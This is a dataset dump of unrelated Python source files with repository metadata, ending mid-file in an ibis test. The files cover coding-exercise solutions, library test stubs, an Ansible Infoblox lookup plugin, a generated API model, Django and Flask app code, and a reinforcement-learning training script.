69a39a410162d7228cbdda1169b643378eecf6aa | 2be2b1daea464c6b48706c6b2696a94af1b2439b | /lesson7'/4.py | 4eecf7173de71093f181cd7da70d3cf04cf250d1 | [] | no_license | kirigaikabuto/pythonlessons1400 | 584fbef15802accd10b21cd33fbd8aa7900e19f3 | af1df1f4b238e9e4476c75cb25a03f92957bc156 | refs/heads/main | 2023-07-12T19:06:08.117125 | 2021-08-14T08:09:11 | 2021-08-14T08:09:11 | 386,884,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | s = "Modern Singapore was founded in 1819 by Sir Stamford Raffles as a trading post of the British Empire. In 1867, the colonies in Southeast Asia were reorganised and Singapore came under the direct control of Britain as part of the Straits Settlements. During the Second World War, Singapore was occupied by Japan in 1942, and returned to British control as a separate crown colony following Japan's surrender in 1945. Singapore gained self-governance in 1959 and in 1963 became part of the new federation of Malaysia, alongside Malaya, North Borneo, and Sarawak. Ideological differences led to Singapore being expelled from the federation two years later and it became an independent country."
s = s.replace(",", "")
s = s.replace(".", "")
words = s.split(" ")
alpha = []
numbers = []
others = []
for i in words:
if i.isalpha():
alpha.append(i)
elif i.isnumeric():
numbers.append(i)
else:
others.append(i)
print(alpha)
print(numbers)
print(others)
| [
"tleugazy98@gmail.com"
] | tleugazy98@gmail.com |
f24751a0aa719ae0e2a5030802510b8a72c06f93 | eec1f3a9a31a61b74d8ace96301653bef87c456e | /bigfish/segmentation/test/test_nuc_segmentation.py | cc3fae3d8803440c507226847bda4180aea3ccdf | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | fish-quant/big-fish | 843ca1b4731afce738d6d557249475482a6870ef | e951ea850b18be4be70c5d0a419ba524c3a59ada | refs/heads/master | 2023-08-25T04:19:14.376366 | 2022-04-25T22:51:57 | 2022-04-25T22:51:57 | 162,127,052 | 43 | 22 | BSD-3-Clause | 2023-07-02T23:29:41 | 2018-12-17T12:26:09 | Python | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
# Author: Arthur Imbert <arthur.imbert.pro@gmail.com>
# License: BSD 3 clause
"""
Unitary tests for bigfish.segmentation.nuc_segmentation module.
"""
# TODO add test for bigfish.segmentation.remove_segmented_nuc
# TODO add test for bigfish.segmentation.unet_3_classes_nuc
# TODO add test for bigfish.segmentation.apply_unet_3_classes
# TODO add test for bigfish.segmentation.from_3_classes_to_instances
| [
"arthur.imbert.pro@gmail.com"
] | arthur.imbert.pro@gmail.com |
61269609d910c84387be9e4eb94204f60e28e97b | 5b6b2018ab45cc4710cc5146040bb917fbce985f | /11_search-range-in-binary-search-tree/search-range-in-binary-search-tree.py | addadc00c229ca4127059cd113b672daa90df11d | [] | no_license | ultimate010/codes_and_notes | 6d7c7d42dcfd84354e6fcb5a2c65c6029353a328 | 30aaa34cb1c840f7cf4e0f1345240ac88b8cb45c | refs/heads/master | 2021-01-11T06:56:11.401869 | 2016-10-30T13:46:39 | 2016-10-30T13:46:39 | 72,351,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,062 | py | # coding:utf-8
'''
@Copyright:LintCode
@Author: ultimate010
@Problem: http://www.lintcode.com/problem/search-range-in-binary-search-tree
@Language: Python
@Datetime: 16-06-11 15:21
'''
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of the binary search tree.
@param k1 and k2: range k1 to k2.
@return: Return all keys that k1<=key<=k2 in ascending order.
"""
def searchRange(self, root, k1, k2):
# write your code here
# inorder traver
if root is None:
return []
ret = []
stack = []
while root or len(stack) > 0:
if root:
stack.append(root)
root = root.left
else:
root = stack.pop()
if root.val <= k2 and root.val >= k1:
ret.append(root.val)
root = root.right
return ret | [
"ultimate010@gmail.com"
] | ultimate010@gmail.com |
b332387214949ab45f1771f0aae9a5028021c655 | a81d21f98dd558416f8731f001cb8151d8309f4f | /interviewbit/interviewbit/pointers/three_sum_zero.py | cea0a17f6a40485087dbf69d9c3abc66aac3694b | [] | no_license | marquesarthur/programming_problems | 1128c38e65aade27e2435f7987d7ee2b328fda51 | 2f7df25d0d735f726b7012e4aa2417dee50526d9 | refs/heads/master | 2022-01-25T18:19:02.575634 | 2022-01-18T02:07:06 | 2022-01-18T02:07:06 | 32,213,919 | 2 | 0 | null | 2020-10-13T01:29:08 | 2015-03-14T13:44:06 | Python | UTF-8 | Python | false | false | 2,088 | py | class Solution:
def threeSum(self, A):
A = sorted(A)
n = len(A)
result = set()
for i in range(n):
j = i + 1
k = n - 1
target = A[i]
while j < k:
if target + A[j] + A[k] < 0:
j += 1
elif target + A[j] + A[k] > 0:
k -= 1
else:
result.add((A[i], A[j], A[k]))
j += 1
return sorted(list(result))
# Exceeds time limit but does the job
class MatrixSolution:
def binarySearch(self, A, x):
begin = 0
end = len(A) - 1
while begin <= end:
mid = int(begin + (end - begin) / 2)
if A[mid] == x:
return mid
elif A[mid] > x:
end = mid - 1
else:
begin = mid + 1
return -1
# @param A : list of integers
# @return a list of list of integers
def threeSum(self, A):
A = sorted(A)
S = list(A)
n = len(A)
B = [None] * len(A)
for i in range(len(A)):
B[i] = [None] * n
for j in range(i + 1, len(A)):
k = A[i] + A[j]
B[i][j] = -k
result = []
for i in range(n):
for j in range(i + 1, n):
x = B[i][j]
s_aux = [x for a, x in enumerate(A) if a != i and a != j and A[a] is not None]
k = self.binarySearch(s_aux, x)
if k != -1 and A[i] is not None and A[j] is not None:
k = self.binarySearch(S, x)
aux = sorted([A[i], A[j], S[k]])
exists = False
for r in result:
if r[0] == aux[0] and r[1] == aux[1] and r[2] == aux[2]:
exists = True
break
if not exists:
result.append(aux)
ret = [(r[0], r[1], r[2]) for r in result]
return ret
| [
"marques.art@gmail.com"
] | marques.art@gmail.com |
6358884396388c3ab81261921c2983e5f5ede5ab | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /jSjjhzRg5MvTRPabx_10.py | 329a38580f7189f6c5c3fc07a47ac0fbdc5fc1a3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py |
def sentence(words):
result = []
if len(words) == 1:
if words[0][0].lower() in "aeiou":
result.append("An " + words[0].lower() + '.')
else:
result.append("A " + words[0].lower() + ".")
elif len(words) == 2:
if words[0][0].lower() in "aeiou" and words[1][0].lower() in "aeiou":
result.append("An " + words[0].lower() + " and an " + words[1].lower() + '.')
elif words[0][0].lower() in "aeiou" and words[1][0].lower() not in "aeiou":
result.append("An " + words[0].lower() + " and a " + words[1].lower() + '.')
elif words[0][0].lower() not in "aeiou" and words[1][0].lower() in "aeiou":
result.append("A " + words[0].lower() + " and an " + words[1].lower() + '.')
else:
result.append("A " + words[0].lower() + " and a " + words[1].lower() + '.')
else:
for i in range(0, len(words) - 2):
if i == 0:
if words[i][0].lower() in "aeiou":
result.append("An " + words[i].lower())
else:
result.append("A " + words[i].lower())
else:
if words[i][0].lower() in "aeiou":
result.append("an " + words[i].lower())
else:
result.append("a " + words[i].lower())
if words[-2][0].lower() in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("an " + words[-2].lower() + " and an " + words[-1] + ".")
elif words[-2][0].lower() in "aeiou" and words[-1][0].lower() not in "aeiou":
result.append("an " + words[-2].lower() + " and a " + words[-1] + ".")
elif words[-2][0].lower() not in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("a " + words[-2].lower() + " and an " + words[-1] + ".")
else:
result.append("a " + words[-2].lower() + " and a " + words[-1] + ".")
return ", ".join(result)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
ea68d77f4f32d08fb814a0049b8bd29dfa307ca4 | 41a0220bf117124bf281a50396582c0df1e0675f | /Pyrado/scripts/evaluation/trn_argmax_policy_bayrn.py | da89629bf80d4d2cf83de3f2f6b06d59b967a485 | [
"BSD-3-Clause"
] | permissive | jacarvalho/SimuRLacra | c071dfc22d4f2c54a198405e8974d03333c9961d | a6c982862e2ab39a9f65d1c09aa59d9a8b7ac6c5 | refs/heads/master | 2022-11-24T20:08:52.376545 | 2020-08-03T09:01:35 | 2020-08-03T09:01:35 | 276,885,755 | 0 | 0 | BSD-3-Clause | 2020-07-03T11:39:21 | 2020-07-03T11:39:21 | null | UTF-8 | Python | false | false | 2,508 | py | """
Script to get the maximizer of a GP's posterior given saved data from a BayRn experiment
"""
import os.path as osp
import torch as to
from pyrado.algorithms.advantage import GAE
from pyrado.algorithms.bayrn import BayRn
from pyrado.algorithms.cem import CEM
from pyrado.algorithms.nes import NES
from pyrado.algorithms.power import PoWER
from pyrado.algorithms.ppo import PPO, PPO2
from pyrado.logger.experiment import ask_for_experiment
from pyrado.utils.argparser import get_argparser
from pyrado.utils.experiments import load_experiment
from pyrado.utils.math import UnitCubeProjector
if __name__ == '__main__':
# Parse command line arguments
args = get_argparser().parse_args()
# Get the experiment's directory to load from
ex_dir = ask_for_experiment() if args.ex_dir is None else args.ex_dir
# Load the environment and the policy
env_sim, policy, kwout = load_experiment(ex_dir, args)
# Load the required data
cands = to.load(osp.join(ex_dir, 'candidates.pt'))
cands_values = to.load(osp.join(ex_dir, 'candidates_values.pt')).unsqueeze(1)
bounds = to.load(osp.join(ex_dir, 'bounds.pt'))
uc_normalizer = UnitCubeProjector(bounds[0, :], bounds[1, :])
# Decide on which algorithm to use via the mode argument
if args.mode == PPO.name:
critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
subroutine = PPO(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
elif args.mode == PPO2.name:
critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
subroutine = PPO2(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
elif args.mode == CEM.name:
subroutine = CEM(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
elif args.mode == NES.name:
subroutine = NES(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
elif args.mode == PoWER.name:
subroutine = PoWER(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
else:
raise NotImplementedError('Only PPO, PPO2, CEM, NES, and PoWER are implemented so far.')
if args.warmstart:
ppi = policy.param_values.data
vpi = kwout['value_fcn'].param_values.data
else:
ppi = None
vpi = None
# Train the policy on the most lucrative domain
BayRn.train_argmax_policy(ex_dir, env_sim, subroutine, num_restarts=500, num_samples=1000,
policy_param_init=ppi, valuefcn_param_init=vpi)
| [
"fabio.muratore@famura.net"
] | fabio.muratore@famura.net |
25c89576f82e9202346193c01764c1a192c9cbfd | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /26_2/26_7.py | e9fd86e7707b27199667321125bfa3feba2697cc | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | file = open('26-j2.txt')
values = sorted(map(int, file.readlines()[1:]))
medium = values[len(values)//2]
avg = sum(values)/len(values)
count = 0
for val in values:
if min(medium, avg) <= val <= max(medium, avg):
count += 1
print(count) | [
"serzh.kazantseff@gmail.com"
] | serzh.kazantseff@gmail.com |
fe0efe683946a1b5e9c30a52b867324f374e121c | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/lookup/nios_next_ip.py | 5b979b8d075f498a8eacf83c572686b3d3b13f96 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 3,580 | py | #
# Copyright 2018 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
---
author: Unknown (!UNKNOWN)
name: nios_next_ip
short_description: Return the next available IP address for a network
description:
- Uses the Infoblox WAPI API to return the next available IP addresses
for a given network CIDR
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
_terms:
description: The CIDR network to retrieve the next addresses from
required: True
num:
description: The number of IP addresses to return
required: false
default: 1
exclude:
description: List of IP's that need to be excluded from returned IP addresses
required: false
'''
EXAMPLES = """
- name: return next available IP address for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24 excluding ip addresses - ['192.168.10.1', '192.168.10.2']
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, exclude=['192.168.10.1', '192.168.10.2'],
provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
"""
RETURN = """
_list:
description:
- The list of next IP addresses available
type: list
"""
from ansible.plugins.lookup import LookupBase
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiLookup
from ansible.module_utils._text import to_text
from ansible.errors import AnsibleError
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
try:
network = terms[0]
except IndexError:
raise AnsibleError('missing argument in the form of A.B.C.D/E')
provider = kwargs.pop('provider', {})
wapi = WapiLookup(provider)
network_obj = wapi.get_object('network', {'network': network})
if network_obj is None:
raise AnsibleError('unable to find network object %s' % network)
num = kwargs.get('num', 1)
exclude_ip = kwargs.get('exclude', [])
try:
ref = network_obj[0]['_ref']
avail_ips = wapi.call_func('next_available_ip', ref, {'num': num, 'exclude': exclude_ip})
return [avail_ips['ips']]
except Exception as exc:
raise AnsibleError(to_text(exc))
| [
"test@burdo.fr"
] | test@burdo.fr |
58178854f14d7de01b5a58abeb950b2d4c6fe2db | 6a61667e176b06ccdef07e84d79b382b2fb491bb | /common/services/email_service.py | 6b2cc57cdf6fc6d96376703f32b4245ec18d1103 | [] | no_license | vsokoltsov/Interview360Server | 333f08f13b33ef88928b3e4b844f60e72ebec809 | 252b0ebd77eefbcc945a0efc3068cc3421f46d5f | refs/heads/master | 2022-12-11T05:38:01.310133 | 2019-03-24T17:47:09 | 2019-03-24T17:47:09 | 95,320,167 | 2 | 3 | null | 2022-12-08T04:54:08 | 2017-06-24T20:09:08 | Python | UTF-8 | Python | false | false | 2,742 | py | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.core.mail import EmailMultiAlternatives
import os
import ipdb
class EmailService:
"""Service for email sending."""
SENDER = 'Anymail Sender <from@example.com>'
@classmethod
def send_interview_reminder(cls, user, vacancy, interview):
"""Send mail with remainding about upcoming interview."""
params = {
'vacancy': vacancy,
'interview': interview
}
msg = render_to_string('interview_reminder.html', params)
topic = 'Upcoming interview notification'
emails = [user]
cls._send_default_mail(topic, msg, emails)
@classmethod
def send_interview_invintation(cls, users, vacancy, interview):
"""Send email with interview invintation."""
params = {
'vacancy': vacancy,
'interview': interview
}
msg = render_to_string('interview_invitation.html', params)
topic = 'Interview invintation'
cls._send_default_mail(topic, msg, users)
@classmethod
def sent_personal_employee_invite(cls, user, token, company):
"""Send email notificaiton about invintation into the company."""
link_url = '{}/auth/invite'.format(
os.environ['DEFAULT_CLIENT_HOST']
)
msg = render_to_string('company_invite.html', {
'company': company,
'link_url': link_url,
'token': token}
)
topic = "Company invite mail"
cls._send_default_mail(topic, msg, [user])
@classmethod
def send_reset_password_mail(cls, user, token):
"""Send reset password email."""
reset_link = '{}/auth/reset-password'.format(
os.environ['DEFAULT_CLIENT_HOST'])
msg = render_to_string('reset_password.html', {
'reset_link_url': reset_link,
'token': token}
)
topic = 'Reset password'
cls._send_default_mail(topic, msg, [user])
@classmethod
def send_company_invite_confirmation(cls, user, company):
"""Send email with approvement of invite confirmation."""
company_link = '{}/companies/{}/'.format(
os.environ['DEFAULT_CLIENT_HOST'], company.id
)
msg = render_to_string('company_invite_final.html', {
'link_url': company_link,
'user': user,
'company': company
})
topic = 'Invite confirmation'
cls._send_default_mail(topic, msg, [user])
@classmethod
def _send_default_mail(cls, topic, message, mails):
"""Send mail with full attributes."""
send_mail(topic, message, cls.SENDER, mails)
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
a6c0a838c9d08cc5d940f86faa2809284d203636 | e3b9e8ec177e2b4c8bf24bbfefd7b2af4cd51e80 | /search/InitializationError.py | 339256d08a540446ba7de3e7f3b6b667392675c7 | [] | no_license | dmitriyVasilievich1986/radius-logs-parser | cae3ea7aade9ddcdd3b8739e8048a80ee8134d7c | f4d4256dee0c772b06d57acf49e72e742d56996e | refs/heads/main | 2023-06-02T23:26:09.001345 | 2021-06-25T13:00:05 | 2021-06-25T13:00:05 | 379,828,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from .Config import V3
class InitializationError(Exception):
def __init__(self, *args, **kwargs):
if V3:
super().__init__(*args, **kwargs)
else:
super(Exception, self).__init__(*args, **kwargs) | [
"dmitriyvasil@gmail.com"
] | dmitriyvasil@gmail.com |
c667278cf860aef9d54dc6dc40e0ec577a621cbe | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /Hard/longestIncreasingSeq/longestIncreasingSeq_test.py | acf4794919c97abea3326458e44a4ef4dad62e8c | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from longestIncreasingSeq import longestIncreasingSeq
import pytest
def test_longestIncreasingSeq():
arr = [13,14,10,11,12]
res = longestIncreasingSeq(arr)
assert(res == [10,11,12])
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
b375d115741069c717a9c061d18b42d1de4fda00 | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_network_controls.py | 3099374b53195c2dcd56ab82bfaefc1258838d85 | [] | no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,756 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasNetworkControls(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'advanced_protection_effect': 'WaasEffect',
'countries': 'WaasAccessControls',
'exception_subnets': 'list[str]',
'subnets': 'WaasAccessControls'
}
attribute_map = {
'advanced_protection_effect': 'advancedProtectionEffect',
'countries': 'countries',
'exception_subnets': 'exceptionSubnets',
'subnets': 'subnets'
}
def __init__(self, advanced_protection_effect=None, countries=None, exception_subnets=None, subnets=None, local_vars_configuration=None): # noqa: E501
"""WaasNetworkControls - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._advanced_protection_effect = None
self._countries = None
self._exception_subnets = None
self._subnets = None
self.discriminator = None
if advanced_protection_effect is not None:
self.advanced_protection_effect = advanced_protection_effect
if countries is not None:
self.countries = countries
if exception_subnets is not None:
self.exception_subnets = exception_subnets
if subnets is not None:
self.subnets = subnets
@property
def advanced_protection_effect(self):
"""Gets the advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:return: The advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:rtype: WaasEffect
"""
return self._advanced_protection_effect
@advanced_protection_effect.setter
def advanced_protection_effect(self, advanced_protection_effect):
"""Sets the advanced_protection_effect of this WaasNetworkControls.
:param advanced_protection_effect: The advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:type advanced_protection_effect: WaasEffect
"""
self._advanced_protection_effect = advanced_protection_effect
@property
def countries(self):
"""Gets the countries of this WaasNetworkControls. # noqa: E501
:return: The countries of this WaasNetworkControls. # noqa: E501
:rtype: WaasAccessControls
"""
return self._countries
@countries.setter
def countries(self, countries):
"""Sets the countries of this WaasNetworkControls.
:param countries: The countries of this WaasNetworkControls. # noqa: E501
:type countries: WaasAccessControls
"""
self._countries = countries
@property
def exception_subnets(self):
"""Gets the exception_subnets of this WaasNetworkControls. # noqa: E501
Network lists for which requests completely bypass WAAS checks and protections. # noqa: E501
:return: The exception_subnets of this WaasNetworkControls. # noqa: E501
:rtype: list[str]
"""
return self._exception_subnets
@exception_subnets.setter
def exception_subnets(self, exception_subnets):
"""Sets the exception_subnets of this WaasNetworkControls.
Network lists for which requests completely bypass WAAS checks and protections. # noqa: E501
:param exception_subnets: The exception_subnets of this WaasNetworkControls. # noqa: E501
:type exception_subnets: list[str]
"""
self._exception_subnets = exception_subnets
@property
def subnets(self):
"""Gets the subnets of this WaasNetworkControls. # noqa: E501
:return: The subnets of this WaasNetworkControls. # noqa: E501
:rtype: WaasAccessControls
"""
return self._subnets
@subnets.setter
def subnets(self, subnets):
"""Sets the subnets of this WaasNetworkControls.
:param subnets: The subnets of this WaasNetworkControls. # noqa: E501
:type subnets: WaasAccessControls
"""
self._subnets = subnets
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WaasNetworkControls):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, WaasNetworkControls):
return True
return self.to_dict() != other.to_dict()
| [
"aakatev@virtru.com"
] | aakatev@virtru.com |
b174000a9efc0a2cfcad23ba2a171ed686f20bdf | 97d34d62e4232e754c5f1a458b2d4068abadc1ab | /flask/flasky-master/app/__init__.py | 8438b924c8c21163e6af7b40d38c746c9ee4c1de | [
"MIT"
] | permissive | chenzhenpin/py_test | d0e4ae32ab43fae4da53d0f0ac7d89b77b041a96 | b05ed73210ab7ebdaa39d8ebcf9687d4ef16125c | refs/heads/master | 2022-12-27T10:21:54.114869 | 2018-12-06T02:04:31 | 2018-12-06T02:04:31 | 159,364,911 | 0 | 1 | null | 2022-12-15T14:30:38 | 2018-11-27T16:22:28 | Python | UTF-8 | Python | false | false | 1,256 | py | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
from flask_sslify import SSLify
sslify = SSLify(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
from .api_1_0 import api as api_1_0_blueprint
app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1.0')
return app
| [
"1595347682@qq.com"
] | 1595347682@qq.com |
ffd5af4e55a9c62b4108a72d9b8dd7da83f80184 | 5a9c11b0d7d9d1ef11c8404c2e38cf2f5c4c6744 | /myapp/migrations/0002_delete_test.py | 41afe6a17802a63e3ce82c28b340021dfa556f12 | [] | no_license | tlaboni-ecl/Demo_project | 7c671498c8f0f65520552c884b274cbbd2aea47c | 9ed5427d504e830df65ec1e8b17f218feb92ad83 | refs/heads/main | 2022-12-20T17:08:58.545689 | 2020-10-17T20:19:52 | 2020-10-17T20:19:52 | 304,962,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | # Generated by Django 2.1.5 on 2020-10-17 06:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0001_initial'),
]
operations = [
migrations.DeleteModel(
name='test',
),
]
| [
"you@domain.com"
] | you@domain.com |
cc9fc4571d0de756eca3429627552998a832d55c | 2ce71cf8b2ab41b5ad26dbcb9b6cc5b8d27e632d | /ibis/pandas/tests/test_udf.py | 9a580c7e8331f1e32dc2db56ba648e0e41c4e422 | [
"Apache-2.0"
] | permissive | brandonwillard/ibis | 6f1341687df7bb15db7c655f0c7697efeb86357e | 93cc4ba8703a96e19660255e6e48e66d7cd69b31 | refs/heads/master | 2020-03-13T17:08:48.066938 | 2018-04-25T20:09:34 | 2018-04-25T20:09:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | import pytest
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import ibis
import ibis.expr.types as ir
import ibis.expr.datatypes as dt
from ibis.pandas.udf import udf, udaf, nullable
from ibis.pandas.dispatch import pause_ordering
with pause_ordering():
@udf(input_type=[dt.string], output_type=dt.int64)
def my_string_length(series, **kwargs):
return series.str.len() * 2
@udaf(input_type=[dt.string], output_type=dt.int64)
def my_string_length_sum(series, **kwargs):
return (series.str.len() * 2).sum()
@udaf(input_type=[dt.double, dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
return lhs.corr(rhs)
@udf([dt.double], dt.double)
def add_one(x):
return x + 1.0
@udf([dt.double], dt.double)
def times_two(x, scope=None):
return x * 2.0
def test_udf():
df = pd.DataFrame({'a': list('abc')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length(t.a)
assert isinstance(expr, ir.ColumnExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2)
tm.assert_series_equal(result, expected)
def test_udaf():
df = pd.DataFrame({'a': list('cba')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length_sum(t.a)
assert isinstance(expr, ir.ScalarExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2).sum()
assert result == expected
def test_udaf_in_groupby():
df = pd.DataFrame({
'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = t.groupby(t.key).aggregate(my_corr=my_corr(t.a, t.b))
assert isinstance(expr, ir.TableExpr)
result = expr.execute().sort_values('key')
dfi = df.set_index('key')
expected = pd.DataFrame({
'key': list('def'),
'my_corr': [
dfi.loc[value, 'a'].corr(dfi.loc[value, 'b']) for value in 'def'
]
})
columns = ['key', 'my_corr']
tm.assert_frame_equal(result[columns], expected[columns])
def test_nullable():
t = ibis.table([('a', 'int64')])
assert nullable(t.a.type()) == (type(None),)
@pytest.mark.xfail(
raises=AssertionError, reason='Nullability is not propagated')
def test_nullable_non_nullable_field():
t = ibis.table([('a', dt.String(nullable=False))])
assert nullable(t.a.type()) == ()
def test_udaf_parameter_mismatch():
with pytest.raises(Exception):
@udaf(input_type=[dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
pass
def test_udf_parameter_mismatch():
with pytest.raises(Exception):
@udf(input_type=[], output_type=dt.double)
def my_corr2(lhs, **kwargs):
return 1.0
def test_call_multiple_udfs():
df = pd.DataFrame({
